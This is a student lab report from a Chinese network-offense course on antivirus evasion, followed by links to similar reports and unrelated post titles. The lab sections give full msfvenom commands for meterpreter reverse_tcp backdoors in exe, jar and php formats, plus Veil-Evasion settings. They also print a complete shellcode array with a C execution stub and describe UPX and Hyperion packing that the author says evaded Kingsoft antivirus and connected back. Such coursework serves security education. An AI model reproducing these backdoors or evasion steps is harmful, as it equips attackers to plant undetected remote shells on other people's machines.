基础问题回答

(1)杀软是如何检测出恶意代码的?

  • 基于特征码的检测:特征码就是一段数据。如果一个可执行文件(或其他运行的库、脚本等)包含特定的数据则被认为是恶意代码。AV软件厂商要做的就是尽量搜集最全的、最新的特征码库。

  • 启发式恶意软件检测:根据些片面特征去推断;通过检测程序的行为是否属于恶意代码的行为来检测。

(2)免杀是做什么?

想方设法让自己的后门程序避免被杀毒软件检测到,实现此程序的功能

(3)免杀的基本方法有哪些?

改变特征码:加壳,shellcode等手段

改变行为:反弹连接,隧道传输等等

实验内容

实验一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧

任务一:使用msf编码器生成各种后门程序及检测

1.正确使用msf编码器,生成exe文件

首先对实验二生成的backdoor后门程序放到网站VirusTotal或Virscan进行检测

后门程序很容易被发现识别

再使用msf编码器对后门程序进行一次和多次的编码,再进行检测

一次编码使用命令:msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.1.154 LPORT=5337 -f exe > 20165337_backdoor.exe

一次编码后效果不大,依旧容易被发现

使用十次编码

十次编码使用命令:msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.1.154 LPORT=5303 -f exe > yy_backdoor.exe

编码十次也没有区别,因为编码总需要解码,杀软只需要把解码的程序代码编入检测库中就可以查杀这一类程序,除非使用新的编码模式。还有msfvenom生成backdoor的模板是固定的,只有用新的模板也许可以不被发现。

2.利用msfvenom生成jar文件

生成java后门程序的命令:msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.154 LPORT=5303 x> yy1_backdoor_java.jar

先生成jar文件,再放入网页扫描



一个软件引擎还是有很多能发现是木马程序,但另一个引擎能发现的就少多了,说明java后门程序还是有效的。

3.msfvenom生成php文件

生成php后门程序的命令如下:msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.154 LPORT=5337 x> yy2_backdoor.php

生成php文件后放入网页进行检测

能发现是后门程序的杀软已经相当少了

任务二:使用veil-evasion生成后门程序及检测

安装指令:sudo apt-get install veil-evasion

安装完毕后先输入veil

然后输入use evasion进入Evil-Evasion

再输入use c/meterpreter/rev_tcp.py进入配置界面

然后设置反弹连接IP set LHOST 192.168.1.154

在设置一下端口,set LPORT 5337设置完成如下图

输入generate生成文件,接着输入生成的程序名字veil_c_5337

放入网页检测

发现并没有什么变化,依然能被很容易的检测出来

任务三:半手工注入Shellcode并执行

使用命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.154 LPORT=5337 -f c这是用C语言生成一段shellcode

再放入codeblocks里加上头文件编译运行一下

#include<stdio.h>
#pragma comment(linker, "/section:.data,RWE")
unsigned char buf[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
"\x77\x26\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54"
"\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\x01\x9a"
"\x68\x02\x00\x14\xd9\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50"
"\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5"
"\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67"
"\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff"
"\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00"
"\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56"
"\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58"
"\x68\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5"
"\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\x0f\x85"
"\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1"
"\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5"; int main()
{
int (*func)() = (int(*)())buf;
func();
}

然后居然在开了金山毒霸的情况下完美运行了,听说别人都会被自己的杀软检测出来,感觉自己要换个杀软了

实验二:通过组合应用各种技术实现恶意代码免杀

任务一:半手工制作shellcode加压缩壳

首先使用压缩壳可以减少应用体积,如ASPack,UPX

把之前的liuyudong.exe放到kali中使用命令upx liuyudong.exe -o yybc_upxed.exe加一个压缩壳

然后拿金山毒霸检测一下,果不其然没有任何问题

然后在杀软开着的情况下运行,运行成功并且能取得权限

放入网页检测还是能被轻易发现

任务二:加密壳

使用加密壳版权保护,反跟踪。如ASProtect,Armadillo

将上一个文件拷贝到/usr/share/windows-binaries/hyperion/

进入目录并输入命令wine hyperion.exe -v yy_upxed.exe yy_upxed_Hyperion.exe

成功后如下

用杀毒软件检查一下发现没有问题

尝试回连并发现可以成功

实验三:用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

同学使用的是金山毒霸

程序与软件管家共存

成功回连结果

实验中遇到的问题

最最难受的问题是我的kali的网有毒,桥接模式不能联网,需要先换成别的再改为桥接才能好,不知道原理,只知道这样能解决

使用杀软一定能防止病毒吗?

不一定,但是杀软能过滤绝大多数病毒,还是有效果的

实验心得

本次实验了解了免杀原理,也亲手制作了能避免被自己的杀软查杀的后门程序,之后和同学交流了很久过后,发现360和腾讯查杀力度一般,但是几次运行后门之后还是有效果;金山毒霸就很low,不能发现任何后门程序,唯一作用就是忽悠我设置金山毒霸的浏览器首页;最最牛逼的是Windows Defencer,所有实验使用的后门程序全都能被检测到,力度极大,恐怖如斯,以后还是换个靠谱的杀软比较好。

2018-2019-2 网络对抗技术 20165337 Exp3 免杀原理与实践的更多相关文章

  1. 2018-2019-2 20165315 《网络对抗技术》Exp3 免杀原理与实践

    2018-2019-2 20165315 <网络对抗技术>Exp3 免杀原理与实践 一.实验内容 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion ...

  2. 2018-2019-2 网络对抗技术 20165317 Exp3 免杀原理与实践

    2018-2019-2 网络对抗技术 20165317 Exp3 免杀原理与实践 实验内容 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用 ...

  3. 2018-2019-2 网络对抗技术 20165318 Exp3 免杀原理与实践

    2018-2019-2 网络对抗技术 20165318 Exp3 免杀原理与实践 免杀原理及基础问题回答 实验内容 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil- ...

  4. 2018-2019-2 网络对抗技术 20165232 Exp3 免杀原理与实践

    2018-2019-2 网络对抗技术 20165232 Exp3 免杀原理与实践 免杀原理及基础问题回答 一.免杀原理 一般是对恶意软件做处理,让它不被杀毒软件所检测.也是渗透测试中需要使用到的技术. ...

  5. 2018-2019-2 网络对抗技术 20165237 Exp3 免杀原理与实践

    2018-2019-2 网络对抗技术 20165237 Exp3 免杀原理与实践 一.实践目标 1.1 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳 ...

  6. 2018-2019-2 网络对抗技术 20165221 Exp3 免杀原理与实践

    2018-2019-2 网络对抗技术 20165221 Exp3 免杀原理与实践 基础问题回答 杀软是如何检测出恶意代码的? 主要依托三种恶意软件检测机制. 基于特征码的检测:一段特征码就是一段或者多 ...

  7. 2018-2019-2 网络对抗技术 20165325 Exp3 免杀原理与实践

    2018-2019-2 网络对抗技术 20165325 Exp3 免杀原理与实践 实验内容(概要) 一.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己 ...

  8. 2018-2019-2 网络对抗技术 20165206 Exp3 免杀原理与实践

    - 2018-2019-2 网络对抗技术 20165206 Exp3 免杀原理与实践 - 实验任务 1 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己 ...

  9. 2018-2019-3 网络对抗技术 20165235 Exp3 免杀原理与实践

    2018-2019-3 网络对抗技术 20165235 Exp3 免杀原理与实践 基础问题回答 杀软是如何检测出恶意代码的? 1.对某个文件的特征码进行分析,(特征码就是一类恶意文件中经常出现的一段代 ...

随机推荐

  1. springIOC原理加载过程

    关于spring ,我以前学过很多次,也看过很多的书.以及博客,但是总是不得要领,这次我再学习一遍,在这里做点记录,如果不对的地方还请大家指正 Ioc: inverse of controller 控 ...

  2. python官网几个下载文件的区别

    进入python官方,下载python编译器,提供了如下几个版本进行选择,这些版本分别是什么意思呢? Python 3.7.1 - 2018-10-20 Download Windows x86 we ...

  3. Centos6.5 pppoe-server

    [root@localhost network-scripts]# rpm -q rp-pppoepackage rp-pppoe is not installed ----------------- ...

  4. 通过后缀名和MIME-TYPE检查实现文件类型校验

    前言 文件上传是一个在开发中很常见的需求场景,通常出于安全考虑,我们会对上传的文件进行类型校验,其中常见的有后缀名校验,mime-type校验 话不多说,直接上代码 1.首先定义允许上传的文件类型白名 ...

  5. redis常见问题

    1.redis满了,怎么处理? (1)内存淘汰策略(2)集群,动态增加redis服务器(推荐) 2.val比较大时(比如50MB),会有什么影响? 因为redis是单线程,多路IO复用的,所以当一个v ...

  6. Apache Flink教程

    1.Apache Flink 教程 http://mp.weixin.qq.com/mp/homepage?__biz=MzIxMTE0ODU5NQ==&hid=5&sn=ff5718 ...

  7. 如何关闭WIN7自动配置 IPV4 地址 169.254

    如何关闭WIN7自动配置 IPV4 地址 169.254 以管理员身份运行cmd.exe 输入:netsh winsock reset catalog 回车 输入:netsh int ip reset ...

  8. 远离go path,弃用go get,使用go mod 进行go语言的学习

    标题说的是go语言的学习,因为我也没做过开发 文章要解决的仅仅是一个问题 当你使用go get 无论如何get不到所需的包的问题 第一步就是下载goland 新手极其推荐goland,因为直接使用gl ...

  9. Linux haproxy基础

    代理作用 web缓存,提供缓存功能,可以加速响应过程. 反向代理,可以隐藏后端服务器 内容路由,可把不同内容类型的请求转发至特定服务器, 转码器,与客户端通信,由于带宽限制,可将报文转码压缩:与后端服 ...

  10. awk 计算某一列的和

    awk 计算某一列的和 我需要通过nova list 显示所有虚拟机的cpu总和,即用awk计算某一列的综合 [root@control01 ~]# nla | awk -F '|' 'BEGIN{s ...